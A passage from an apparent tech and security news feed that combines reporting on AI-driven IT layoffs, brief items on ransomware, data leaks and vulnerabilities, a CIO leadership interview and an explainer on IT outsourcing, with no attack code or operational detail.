“Sadly, a lot of those recession plans basically were dusted off from the pandemic, but now with a new layer of AI.” A shift in the workforce Other IT employment experts see some of the same trends. Companies looking to grow are shifting away from mass hiring and toward selective scaling, Patrice Williams-Lindo, CEO of career coaching firm Career Nomad. “Companies are trimming legacy roles while quietly hiring for new AI-augmented positions,” she says. “The ‘net job loss’ headline masks a deeper reallocation of labor — from operational maintenance to innovation hubs and AI integration roles.” Williams-Lindo sees the impact of AI not only in replacing jobs, but also in displacing skill sets. Midlevel IT support, QA testing, and some software engineering jobs are increasingly automated, she says. Over the long term, a new kind of workforce will emerge, she says. “Tech layoffs are no longer just a market correction — they’re a quiet restructuring of the entire digital labor economy,” Williams-Lindo adds. “And the workers being cut? They’re often the very ones who built it.” The irony of replacing workers with AI is that technology still needs employees to watch over it, she adds. “AI is creating a massive new demand for reskilled professionals who can train, manage, and govern these systems,” Williams-Lindo says. “Those who pivot into AI fluency and digital ethics will thrive. Those who don’t risk being left behind.” IT professionals who survive the current environment will have to be adaptable, brand-visible, and AI-augmented, she says. “We’re in a post-loyalty labor market,” Williams-Lindo adds. “The real question isn’t if AI is being used to cut jobs — it’s how leaders can use it to reimagine roles, upskill teams, and future-proof their workforce without erasing the human edge.” The value of AI skills Workers with “product intuition” and AI skills are now commanding the highest salaries, pointing toward a hybrid skillset, says Sam Wright, head of partnerships at job seeker site Huntr.co. Willaims-Lindo and Talentfoot’s Fetter both call on IT workers to build their AI expertise, and Huntr.co’s data, collected from job hunters and job sites, reinforces that advice. Still, the overall IT job market has cooled sharply since October, Wright says, even after the huge number of layoffs in 2024. More than half of US IT jobs are clustered in a few metro areas like Seattle and San Francisco, he notes. Wright hasn’t yet seen a widespread effort to replace IT workers with AI, despite warnings from Fetter and Williams-Lindo. “AI is being pushed as a growth driver more than a cost driver right now,” he says. “The idea is more productive not to cut the workforce. We are seeing employers covet employees that use AI to grow revenue.” Other observers see AI-related layoffs coming. IT layoffs will continue through 2026, with sysadmins, QA testers, back-office IT, and mid-tier management jobs most at risk, says Nic Adams, CEO at automated security vendor 0rcus. “Roles relying on routine, repetitive work or can be automated through LLMs, scripting, or RPA are on the chopping block,” he says. “Only technical specialists tied to critical infrastructure, AI systems, or offensive security have real insulation from these cuts.” Entry-level security analysts, low-level tech support agents, manual QA testers, and network operations center monitoring technicians are especially at risk of being replaced by AI, he says. “AI tools are already handling detection, triage, and basic response faster than humans can keep in sync,” Adams says. “The more rules-driven the job, the more likely to permanently dissolve.” While fears of recession and inconsistent US trade policy have driven some IT layoffs, the underlying catalyst is systemic automation, Adams adds. “Enterprises demand leaner teams, higher velocity, and instant scale,” he says. “The bottom third of legacy teams are being displaced, only because of new business models taking shape. It’s not only for OPEX and cost savings.”

Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper.”

The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q1 2025.

The number of attacks on mobile devices involving malware, adware, or unwanted apps saw a significant increase in the first quarter.

On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.

API keys, secrets, and tokens commonly left exposed in browser extensions’ code.

Extensions analyzed expose information such as browsing domains, machine IDs, OS details, usage analytics, and more.

Lee Enterprises has completed its investigation into the recent ransomware attack and confirmed that a data breach occurred. The post Lee Enterprises Says 40,000 Hit by Ransomware-Caused Data Breach appeared first on SecurityWeek.

The Everest ransomware group has allegedly published a full cache of data purportedly belonging to Jordan Kuwait Bank (JKB), following an initial attack reportedly occurring on April 26, 2025. Jordan Kuwait Bank is a financial institution offering a comprehensive suite of banking services. As a significant entity in the financial sector, the bank is responsible […]

A bizarre case of political impersonation, where Trump’s top aide Susie Wiles is cloned (digitally, not biologically — we think), and high-ranking Republicans start getting invitations to link up with "her" on Telegram to share their Trump pardon wishlists. Was it a deepfake? Or just someone with a halfway decent impression and access to a shady data broker? Meanwhile, we take a worryingly familiar journey into the mental health crisis in the UK — and how TikTok is stepping in with advice like “eat an orange in the shower” to cure your anxiety. Spoiler: it won’t. But it might make your bathroom smell nice. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Earl Newsome, CIO of Cummins, has built a remarkable track record leading transformations of global IT organizations into world-class centers of innovation and operational excellence. A highly intentional executive, Newsome is also a master at leading with clarity, a key skill in world where change is constant, generative AI is rewriting the rules, and the pace of disruption continues to accelerate. On a recent episode of the Tech Whisperers podcast, Newsome gave a masterclass in leading, adapting, and inspiring, drawing from his playbook of leadership principles tailored to the real-world complexities of IT today. Afterward, we spent time exploring the essential mindsets, behaviors and skillsets Newsome has defined in his “8 Habits of Highly Effective IT Organizations” and “7 Habits of Highly Effective IT Leaders.” Together, these 15 habits form a pragmatic, actionable roadmap for anyone looking to build a future-ready IT organization and to become a leader who not just reacts to change but creates it. What follows is that conversation, edited for length and clarity. Dan Roberts: The habits that you highlight clarify excellence in a way that makes it easy for people to understand where the bar is and what the expectation is. What was the thought process behind defining them? Earl Newsome: As a leader, you measure people by your own yardstick, and often people don’t know what that yardstick is if you don’t write it down or share it or express it. Then you’re in your head, measuring this person against this yardstick, but they don’t have any idea what it is. This gives you the ability to set forth what your measurements and yardstick are. That way, when you measure people from the only frame of reference you can, which is your own, you’re all on the same page. What’s the value of putting it in writing? Why is this kind of communication such an important aspect of leadership? It starts with the power of the pen: He who has the pen has the power to control the narrative, and therefore they have the power to rewrite the past and influence the future. As executives and leaders, our words are strong, but our pen is stronger, because our pen is there when we’re not there. If we capture our thoughts and words in writing, it will represent us when we’re not there. The power of the written word and the media from which it’s shared gives it durability, expansiveness, and the ability to spread. This is also why we need to be very careful about what we say in writing. There’s also what we put in writing about ourselves. There’s your CV, which speaks to you, as well as what I call your enhanced resume, which can speak about you and advocate for you. And then there’s this notion of your digital twin, or the digital version of you. You have an ability to control that digital twin a bit by putting yourself out there, and part of that is through your writings. Thanks to the power of the pen, you can be your own advocate by talking about yourself, and if you’re doing that, you’re also now managing your digital twin. One of your ‘8 Habits of Highly Effective IT Organizations” that emphasizes this point is ‘storytelling — don’t be silent.’ How has today’s environment amplified this need among IT leaders? There’s an old tape we listen to that says, ‘Sometimes the best thing that can be said about IT is nothing.’ We have to abandon that old tape and tell our story, because in a world where ‘software eats everything,’ as Mark Andreessen famously said, IT executives have to be really great at storytelling and not be silent. We have to pivot to being upfront and blunt and bold, to tell our story, use our power of the pen, be our own advocates, and create our own digital twins of what we’re doing so people know the contributions we bring. After all, we are now the cool kids. IT is making hardware cool again. We’ve made an intelligent thermostat and smartphones and self-driving cars. Back in the day, we were the geeks with our pocket protectors. Now we are the big kids on campus, so let’s leverage our storytelling and talk about our cool-kid-ness. It needs to be both a verbal and a written exercise, because while putting it down on paper is important for crystallizing the thinking, telling it crystallizes it even more. The exercise of repeating it helps you synthesize it and make it even more palatable on the page. That cyclicality of the verbal and written exercise helps you fine-tune and hone your message over time. The more you tell your story, the better you’ll get at doing it. What role does being clear-minded about your own purpose play in all of this? As part of our leadership culture at Cummins, we define what our life purposes are and write them down, and I think it provides two things: First, it gives you clarity on why you do what you do. Once you understand your life purpose, you can put your own words, deeds, and actions into perspective about why you do certain things and what the underlying impetus is. My purpose helps me figure out why Earl is Earl — because I want to build a world without limits so people can be all they can be while creating some magic along the way. It also gives you a reason to generate followership. I don’t think your purpose, in and of itself, creates followership, but I do think expressing your purpose in life in words, actions, and deeds increases followership because it gives people the chance to be clear about why you do what you do and why they would want to follow you. It’s very powerful if you can be clear about why you do what you do. Doubt goes away, bravery replaces doubt, and encouragement replaces reluctance. All those things move you from point A to point B. This is also where self-motivation comes from. You know the model: Here’s where you are, here’s where you want to be, and in the gap between those two lies discomfort. But that discomfort creates motivation. Having a clear mind about your purpose gives you the additional motivation to move from where you are, because if you’re doing things that aren’t associated with your purpose, that creates discomfort and should encourage you to be more in line with your purpose. Of course, these lines move. Once you’re over here, the next thing comes up, another point of discomfort happens, and you move again. You’re always going to be in a state of discomfort, but that’s not a bad thing, because it’s the motivation to change and do better. It’s a constructive discomfort. When we talk about how to become more adaptive, resilient, and change-savvy, it seems like that is the outcome of constructive discomfort. Constructive discomfort is the impetus to continuous learning, adaptability, agility, and anti-fragility. The concept of anti-fragile means designed for change. How do we build anti-fragile humans so they are unbreakable and prepared for tomorrow’s world, whatever it brings? We have these fault-tolerant designs where I can unplug a server and the system adapts and you don’t even know it. We want to create that same anti-fragility and fault tolerance in the human beings we train. We’re living in this ever-changing, accelerating VUCA [volatile, uncertain, complex, ambiguous] world, and there are two responses when you are presented with the unknown or the unexpected: You can freeze and be fearful and have it overcome you, or you can improvise, adapt, and overcome it by being a continuous learner and continuous adapter. I think resiliency in human beings is driven by this constructive discomfort, which creates a path to being continuous learners and continuous adapters. That’s where the muscle to improvise, adapt, and overcome comes from. Looking across all 15 habits you’ve come up to be effective as an IT organization and IT leader, what advice do you have for up-and-coming IT leaders and those who aspire to C-suite positions? One of the things I talk about is the 360-degree aspect of leadership: being technically, tactically, and strategically competent. Strategic competence is knowing what hill to take, tactical competence is knowing how to take that hill safely, and technical competence is rolling up your sleeves and helping along the way. The leaders I admire have all three. The person who doesn’t have technical competence may set forth an objective and even chart the path to get there, but then they go have coffee. That leader is probably not going to do well. The leader who’s afraid to get their hands dirty is going to get dirtied. There’s also the quad deep model of intelligence: Business intelligence is how we make money. Industry intelligence is how we compete and win. Social intelligence is how people think and feel. And technical intelligence is being a master at your craft. I think one of the most important things you can have as an IT leader is deep intelligence across all four. During your career, the percentage of time you spend in each of the four is going to change over time. For example, when you graduate, you’re going to spend a lot of time on technical intelligence, but as you move up the executive ranks, you’re going to spend much more time on social intelligence. You have to realize that these are not all equal, and depending on where you are in your career journey, you are going to need to invest in different levels of building up these different IQs. You may not know, so you may need to ask, ‘Where do I need to invest now? Where’s my biggest gap? How do I close that gap to give me the chance to move forward?’ Ask questions; apply frameworks. Methodology and frameworks will give you the ability to frame problems in a different way and have a more consultative mindset. Think boldly and challenge the business and functions. Have that business mindset, but don’t just believe the PowerPoints and the analysts and the salesperson. Be a professional skeptic and challenge them on what they ask you to do rather than just being an order-taker. Your job is to be the ultimate arbiter of truth between what your business is asking for,what they need, and what the analysts and vendors are telling you they can do. The way you become that arbiter of truth is by building your skeptical muscle such that you challenge everything in a professional way, do the right due diligence, and then pick the right solution, knowing that if you’re wrong, you’ll be willing to pivot based on new information. You talked about the importance of being a continual learner. What can IT leaders do to make their own learning and growth a habit? Be curious. Don’t walk away from any learning opportunity. Learn something from everyone, even if it’s what not to do. Build your network both inside and outside your company, and at the same time, make sure you give more than you take from the networks you operate within. Build a personal board of directors — those people who will give you the unvarnished truth. They don’t have to know they’re on your personal board; just put them on your list and ask them questions they can answer. Engage in the circles you are able to, and don’t worry about being perfect; just follow those people you admire and do what they do. You don’t have to be a comedian. You don’t even have to be a great storyteller, but you can learn to tell your version of the story and be effective at that. Be provocative, but most importantly, be authentic. And lastly, be scrappy — by doing things faster and at a lower cost than others, by setting high goals, and by never resting on success. That’s where you can be unique, because you do more with what you have than others can do with it. The ‘WorkSpace’ habit of effective IT organizations emphasizes creating an environment where people can thrive. I know that’s something you are extremely purposeful about. What drives that intention for you? Everything is a people business. Your knowledge capital is contained within people. That’s how you grow and drive your business. When you recognize that every company is just an organization of people, then you want to create an environment where everyone can thrive. And it extends even further: Your family is an organization of people. Your community is an organization of people. Your country is an organization of people. They’re all just organizations of people, and when you come to that realization, you want to create an environment where all of them can thrive, because when we all thrive, we all win. For more wisdom, insight, and advice from Earl Newsome, one of the most intentional leaders in our profession, tune in to the Tech Whisperers podcast. See also: How music shapes Dan Massey’s approach to IT leadership CIO legend Andi Karaboutis on what every IT leader should master KeyBank CIO Amy Brady heeds the transformative call of IT leadership

Two members of a group of cybercriminals named ViLE were sentenced this week for hacking into a federal law enforcement web portal in an extortion scheme.

The Interlock ransomware group has leaked data allegedly stolen from Kettering Health in a recent cyberattack. The post Ransomware Gang Leaks Alleged Kettering Health Data appeared first on SecurityWeek.

This month’s top stories: Vietnam cracks down on counterfeit goods amid threat of US tariffs; Belgian authorities launch corruption investigation into procurement involving NATO; and Government of Guinea revokes mining concessions held by 46 companies.

Paul Chichester, director of operations at the UK’s National Cyber Security Centre, urged businesses to keep closer tabs on geopolitical events to gauge potential cyber threats.

ESET published research on the Iranian APT "BladedFeline," which researchers believe is a subgroup of the cyber-espionage entity APT34.

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

Outsourcing definition Outsourcing is defined as a business practice in which services or job functions are hired out to a third-party on a contract or ongoing basis. In IT, an outsourcing initiative with a technology provider can involve a range of operations, from the entirety of the IT function to discrete, easily defined components, such as disaster recovery, network services, software development,or QA testing.  Companies may choose to outsource services onshore (within their own country), nearshore (to a neighboring country or one in the same time zone), or offshore (to a more distant country). Nearshore and offshore outsourcing have traditionally been pursued to save costs.  IT outsourcing services  Business process outsourcing (BPO) is an overarching term for the outsourcing of a specific business process task, such as payroll. BPO is often divided into two categories: back-office BPO, which includes internal business functions such as billing or purchasing, and front-office BPO, which includes customer-related services such as marketing or tech support.  IT outsourcing is a subset of business process outsourcing, and it falls traditionally into one of two categories: infrastructure outsourcing and application outsourcing. Infrastructure outsourcing can include service desk capabilities, data center outsourcing, network services, managed security operations, or overall infrastructure management. Application outsourcing may include new application development, legacy system maintenance, testing and QA services, and packaged software implementation and management.  Today, however, IT outsourcing can also include relationships with providers of software-, infrastructure-, and platforms-as-a-service. These cloud services are increasingly offered not only by traditional outsourcing providers but by global and niche software vendors or even industrial companies offering technology-enabled services.  [ For more on the latest trends in outsourcing, see 7 hot IT outsourcing trends — and 7 going cold.]  Reasons companies outsource IT Outsourcing began to improve organizational bottom lines: the company doing the outsourcing would seek partners who would charge less for outsourced services than it would cost to hire people in-house, perhaps in regions with different work cultures or labor laws.   But as outsourcing has become engrained in management culture, some enterprises will choose to outsource IT or other functions even if doing so doesn’t immediately lower their costs. Instead, they may wish to benefit from outsourcing firms’ expertise rather than building that knowledge in-house. “Organizations are meanwhile outsourcing not just for efficiency but for effectiveness, access to skills, and for focusing on core business, cutting-edge innovation, modernization and business transformation,” Forrester senior analyst Jeffrey Rajamani told CIO.  Top IT outsourcing companies  Outsourcing Accelerator, a global outsourcing marketplace, commissions the annual OA500 report, analyzing and ranking the world’s top 500 outsourcing firms. The top 10 firms from the 2024 report  are the following:  Accenture  Teleperformance  Concentrix  Wipro  Capgemini  Cognizant  HCL Technologies  Infosys  CGI  Tech Mahindra  Outsourcing benefits and risks The business case for outsourcing varies by situation, but the benefits and risks of outsourcing are outlined in the table below: Whether you’re looking to cut costs, access specialized expertise, or enhance flexibility, IT outsourcing is complex. To help you weigh your options, this table outlines the primary benefits of IT next to the common outsourcing challenges and risks you need to consider. IDG IT outsourcing models and pricing  The appropriate model for an IT service is determined by the service provided. Most outsourcing contracts have been billed on a time and materials or fixed price basis. But as outsourcing services have matured to include strategic transformation and innovation initiatives, contractual approaches have evolved to include managed services and outcome-based arrangements.  The most common ways to structure an outsourcing engagement include the following:  Pricing modelEngagement details Time and materials The client pays the provider based on the time and materials used to complete the work. Historically, this has been used in long-term application development and maintenance contracts. It can be appropriate when scope and specifications are difficult to estimate or needs evolve rapidly. Unit/on-demand pricing The vendor determines a set rate for a particular level of service, and the client pays based on its usage of that service. Pay-per-use pricing can deliver productivity gains from day one and makes component cost analysis and adjustments easy. But it requires an accurate estimate of the demand volume and a commitment for minimum transaction volumes. Fixed pricing Here, the price is determined at the beginning. This can work well when there are stable requirements, objectives, and scope. Fixed pricing makes costs predictable, but when market pricing goes down over time, a fixed price stays fixed. It is also hard on the vendor, which must meet service levels at a certain price no matter how many resources those services require. . Variable pricing The customer pays a fixed price at the low end of a supplier’s provided service, but this method allows for variance in pricing based on providing higher levels of services. Cost-plus The client pays the supplier for its costs, plus a predetermined percentage of profit. Such plans do not allow for flexibility as objectives or technologies change, and it provides little incentive for a supplier to perform effectively. Performance-based pricing Here, financial incentives encourage the supplier to perform optimally. This type of pricing plan also requires suppliers to pay a penalty for unsatisfactory service levels. This model is often used in conjunction with a traditional pricing method, such as time-and-materials, and can be beneficial when the customers can identify specific investments the vendor could make to deliver a higher level of performance. Gain-sharing Pricing is based on the value delivered by the vendor beyond its typical responsibilities. For example, an automobile manufacturer may pay a service provider based on the number of cars it produces. With this kind of arrangement, the customer and vendor each have skin in the game, and each stand to gain a percentage of profits if the supplier’s performance is optimum and meets the buyer’s objectives. Shared risk/reward Provider and customer jointly fund the development of new products, solutions, and services with the provider sharing rewards for a defined period. This model encourages the provider to come up with ideas to improve the business and spread financial risk between both parties. But it requires a greater level of governance to do well. Outsourcing vs. offshoring The term outsourcing is often used interchangeably — and incorrectly — with offshoring, usually by those in a heated debate. But offshoring is a subset of outsourcing wherein a company outsources services to a third party in a country other than the one in which the client company is based, typically to take advantage of lower labor costs. This subject continues to be charged politically because offshore outsourcing is more likely to result in layoffs.  Outsourcing IT jobs  Estimates of jobs displaced or jobs created due to offshoring tend to vary widely due to lack of reliable data. In some cases, global companies set up their own captive offshore IT service centers to reduce costs or access skills.   Some roles typically offshored include software development, application support and management, maintenance, testing, help desk/technical support, database development or management, and infrastructure support. However, companies that once leaned heavily on outsourcing are now reassessing that balance and investing in internal upskilling programs, especially as low-code, no-code, and AI technologies become more accessible—and know-how on those subjects becomes more important.   [ For more, read CIO’s interview with Kimberly-Clark tech exec Zack Clark for how he’s handling outsourcing.]  In recent years, IT service providers increased investments in IT delivery centers in the US, according to a report from Everest Group. Offshore outsourcing providers have also increased their hiring of US IT professionals to gird against potential increased restrictions on the H-1B visas they use to bring offshore workers to the US to work on client sites.  Some industry experts point out that increased automation and robotic capabilities may actually eliminate more IT jobs than offshore outsourcing.  Outsourcing risks and challenges  The failure rate of outsourcing relationships remains high, ranging from 40% to 70%. At the heart of the problem is the inherent conflict of interest in any outsourcing arrangement. The client seeks better service, often at lower costs, than it would get doing the work itself. The vendor, however, wants to make a profit. That tension must be managed closely to ensure a successful outcome for both client and vendor. A service level agreement (SLA) is one lever for navigating this conflict — when implemented correctly.  An SLA is a contract between an IT services provider and a customer that specifies, usually in measurable terms, what services the vendor will furnish. Service levels are determined at the beginning of any outsourcing relationship and are used to measure and monitor a supplier’s performance. [ For more on outsourcing contracts, see 11 keys to a successful outsourcing relationship and 7 tips for managing an IT outsourcing contract.]  Another cause of outsourcing failure is the rush to outsource as a “quick fix” cost-cutting maneuver rather than an investment designed to enhance capabilities, expand globally, increase agility and profitability, or bolster competitive advantage.  Risks increase as the boundaries between client and vendor responsibilities blur and the scope of responsibilities expands. Whatever the type of outsourcing, the relationship will succeed only if both the vendor and the client achieve expected benefits.  [ See also: 9 IT outsourcing mistakes to avoid” and “10 early warning signs of IT outsourcing disaster.]  Types of outsourcing  Many years ago, the multibillion-dollar megadeal for one vendor hit an all-time high, but wholesale outsourcing proved difficult to manage for many companies. These days, CIOs have embraced the multi-vendor approach, incorporating services from several best-of-breed vendors.  Multisourcing, however, is not without challenges. The customer must have mature governance and vendor management practices in place. Failure to enforce cross-vendor collaboration can undermine strategic initiatives entirely: CIO.com’s Bob Lewis lays out a scenario where an APR consultancy’s project failed when another vendor withheld client-owned data to sabotage a rival’s success. In contract negotiations, CIOs need to spell out that vendors must cooperate or else risk losing the contract. CIOs need to find qualified staff with financial as well as technical skills to help run a project management office or some other body that can manage the outsourcing portfolio.  The rise of digital transformation has initiated a shift away from siloed IT services. As companies embrace new development methodologies and infrastructure choices, many standalone IT service areas no longer make sense. Some IT service providers seek to become one-stop shops for clients through brokerage services or partnership agreements, offering clients a full spectrum of services from best-in-class providers.  How to select a service provider  Selecting a service provider is a difficult decision, and no one outsourcer will be an exact fit for your needs. Trade-offs will be necessary.  To make an informed decision, articulate what you want from the outsourcing relationship to extract the most important criteria you seek. It’s important to figure this out before soliciting outsourcers, as they will bring with their own ideas of what’s best for your organization, based largely on their own capabilities and strengths.  Some examples of the questions you’ll need to consider include the following:  What’s more important to you: the total amount of savings an outsourcer can provide you or how quickly they can cut your costs?  Do you want broad capabilities or expertise in a specific area?  Do you want low, fixed costs or more variable price options?  Once you define and prioritize your needs, you’ll be better able to decide what trade-offs are worth making.  Outsourcing advisers  Many organizations bring in a sourcing consultant to help establish requirements and priorities. Third-party expertise can help, but it’s important to research the adviser well. Some consultants may have a vested interest in getting you to pursue outsourcing rather than helping you figure out if outsourcing is a good option for your business. A good adviser can help an inexperienced buyer through the vendor-selection process, aiding them in steps like conducting due diligence, choosing providers to participate in the RFP process, creating a model or scoring system for evaluating responses, and making the final decision.  [ For more advice, see Outsourcing advisors: 6 tips for selecting the right one.]  Negotiating the best outsourcing deal  Balancing the risks and benefits for both parties is the goal of the negotiation process, which can get emotional and even contentious. But smart buyers will take the lead in negotiations, prioritizing issues that are important to them, rather than being led around by the outsourcer.  Creating a timeline and completion date for negotiations will help rein in the process. Without one, discussions could go on forever. But if an issue needs time, don’t be a slave to the date.  Finally, don’t take any steps toward transitioning the work to the outsourcer while in negotiations. An outsourcing contract is never a done deal until you sign on the dotted line, and if you begin moving the work to the outsourcer, you will be handing over more power over the negotiating process to them as well.  Strategic outsourcing trends  Traditionally viewed from a cost perspective, outsourcing relationships are increasingly being viewed for their strategic potential of late, with shifts in models, new approaches to contracts, and delivery strategies evolving to follow suit.  Such changes include use of performance-based, vested sourcing, and shared services models, as well as equity partnerships; shifts from request for proposal to request for partnership bidding models, as well as request for solution competitive bidding processes; and increased embracing of relational contracts over transactional contracts.  The underlying idea behind these shifts is to establish stronger business partnership alliances with outsourcing providers, along with an emphasis on outcome-based business models underpinned by pricing models that are incentivized to optimize those business outcomes.  At the same time, organizations are evolving the way they think about staffing, increasingly outsourcing routine tasks or automating them to free up headcount for hybrid roles that demand both technical skill and strategic thinking. (More on headcount trends here.)  IT outsourcing’s hidden costs  Depending on what is outsourced and to whom, studies show that an organization will end up spending at least 10% percent above the agreed-upon figure to manage the deal over the long haul. Among the most significant additional expenses associated with outsourcing are:  The price benchmarking and analysis to determine whether outsourcing is the right choice  The cost of investigating and selecting a vendor  The cost of transitioning work and knowledge to the outsourcer  Costs resulting from possible layoffs and their associated HR issues  Costs of ongoing staffing and management of the outsourcing relationship  It’s important to consider these hidden costs when making a business case for outsourcing.  The outsourcing transition  Vantage Partners once called the outsourcing transition period — during which the provider’s delivery team gets up to speed on your business, existing capabilities and processes, expectations and organizational culture — the “valley of despair.”   During this period, the new team is trying to integrate transferred employees and assets, begin the process of driving out costs and inefficiencies, while keeping the lights on. Throughout this period, which can range from several months to a couple of years, productivity very often takes a nosedive.  The problem is that this is also the time when executives on the client side look most avidly for the deal’s promised gains; business unit heads and line managers wonder why IT service levels aren’t improving; and IT workers wonder what their place is in this new mixed-source environment.   The best advice is to anticipate that the transition period will be trying, attempt to manage the business side’s expectations, and set up management plans and governance tools to get the organization over the hump.  Outsourcing governance  A highly collaborative relationship based on effective contract management and trust can add value to an outsourcing relationship. An acrimonious relationship, however, can detract significantly from the value of the arrangement; the positives degraded by the greater need for monitoring and auditing. In that environment, conflicts frequently escalate and projects don’t get done.  Successful outsourcing is about relationships as much as it is actual IT services or transactions. As a result, outsourcing governance is the single most important factor in determining the success of an outsourcing deal. Without it, carefully negotiated and documented rights in an outsourcing contract run the risk of not being enforced, and the relationship that develops may look nothing like what you envisioned.  [ For more on outsourcing governance, see 7 tips for managing an IT outsourcing contract.]  Repatriating IT — when backsourcing makes sense Repatriating or backsourcing IT work (bringing an outsourced service back in-house) when an outsourcing arrangement is not working — either because there was no good business case for it in the first place or because the business environment changed — is always an option. However, it is not always easy to extricate yourself from an outsourcing relationship, and for that reason many clients dissatisfied with outsourcing results renegotiate and reorganize their contracts and relationships rather than attempt to return to the pre-outsourced state. But, in some cases, bringing IT back in house is the best option, and in those cases it must be handled with care. This trend is part of a broader IT realignment effort, where companies are increasingly replacing outsourcing arrangements with internal centers of excellence for key functions like DevSecOps and agile development.   Captive centers (aka DIY outsourcing)  A captive center is a service delivery organization owned and operated by its client, to which the center provides direct resources. These centers are typically offshore in low-cost locations and provide an alternative to the traditional outsourcing model, although some are often initially set up by traditional outsourcers before being transitioned to the client.  Fully owned global IT service centers are picking up steam as a talent and service delivery strategy of late, but going the captive route requires clear-eyed consideration of benefits and risks, as well as desired business outcomes.   [ For more on this model, see Captive centers are back. Is DIY offshoring right for you? ]  More on outsourcing: 7 hot IT outsourcing trends — and 7 going cold Top 10 IT outsourcing providers 9 outsourcing myths debunked The hidden costs of outsourcing 11 keys to a successful outsourcing relationship 9 IT outsourcing mistakes to avoid 10 early warning signs of IT outsourcing disaster 12 signs your strategic partnership has gone wrong 7 keys to transformational outsourcing success SLA guide: Best practices for service-level agreements 10 dos and don’ts for crafting more effective SLAs How to contract for outsourcing agile development

A threat actor has allegedly claimed to possess administrative-level access to the Remote Desktop Protocol (RDP) of “gob.es,” the official domain of the Spanish government. This domain is a critical piece of national infrastructure, hosting various governmental services and information. The alleged breach, if confirmed, could represent a significant cybersecurity incident with far-reaching implications for […]

126822068 Olivier Le Moal – shutterstock.com Laut einem Bericht der Regionalzeitung Westfalen-Blatt bemerkte die IT von Wellteam bereits am 23. Mai, dass Hacker in das System eingedrungen waren. Demnach führte der Angriff zu einem kompletten Betriebsausfall. „Maschinen blieben still, Lastwagen im Depot, Mitarbeiter wurden nach Hause geschickt“, heißt es. Wie der Westdeutsche Rundfunk WDR berichtet, war zunächst die interne Kommunikation betroffen. Zwar seien gemäß der internen Notfallprozesse umfangreiche Schutzmaßnahmen eingeleitet worden, dennoch habe es letztendlich gravierende Ausfälle gegeben, erklärte Geschäftsführer Sieghard Schöneberg gegenüber dem Sender. Weitere Details zu dem Angriff will das Unternehmen derzeit aufgrund der laufenden Ermittlungen nicht preisgeben. Daher ist unklar, ob Daten abgegriffen wurden und wie die Täter in das System gekommen sind. Zudem ist nicht bekannt, ob es sich um eine Ransomware-Attacke mit Lösegelderpressung handelt. Wellteam beschäftigt an drei Standorten im Kreis Herford etwa 600 Mitarbeiter und erzielte zuletzt nach eigenen Angaben einen Jahresumsatz von mehr als 100 Millionen Euro. Lesetipp: Diese Unternehmen hat es schon erwischt

Customer credentials for Bank Syariah Indonesia (BSI), a major state-owned Islamic bank, have allegedly surfaced on a dark web forum. A threat actor claims to be in possession of “stealer logs” containing sensitive login information apparently belonging to BSI customers. This type of compromise typically results from malware on users’ personal devices capturing their usernames […]

China issued warrants for 20 Taiwanese people it said carried out hacking missions in the Chinese mainland on behalf of the island’s ruling party. The post China Issues Warrants for Alleged Taiwanese Hackers and Bans a Business for Pro-Independence Links appeared first on SecurityWeek.

The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of state-sponsored hackers linked to the RedLine infostealer malware and its alleged creator, Russian national Maxim Alexandrovich Rudometov. This bounty is part of the Rewards for Justice program, which was established under the 1984 Act to Combat International Terrorism. The initiative offers rewards to individuals who provide valuable information that helps identify or locate foreign government threat actors involved in cyberattacks against U.S. entities, especially those targeting critical infrastructure. The Department is specifically seeking tips about foreign government-linked […] The post U.S. Offers $10M Reward for Intel on RedLine Malware Hackers first appeared on Cybersafe News.

Cisco fixed a critical flaw in the Identity Services Engine (ISE) that could allow unauthenticated attackers to conduct malicious actions. A vulnerability tracked as CVE-2025-20286 (CVSS score 9.9) in cloud deployments of Cisco ISE on AWS, Microsoft Azure, and Oracle Cloud Infrastructure allows unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify […]

Endpoint and network security is still essential, even as malicious actors turn to supply chains, identities and AI

A 63.4MB database, purportedly containing sensitive employee information from the business management software company Odoo, is allegedly being offered for sale on a dark web forum. The seller claims the data was obtained via a “collaborative effort with a senior insider” from Odoo. Odoo is a prominent Belgian company that provides a suite of open-source […]

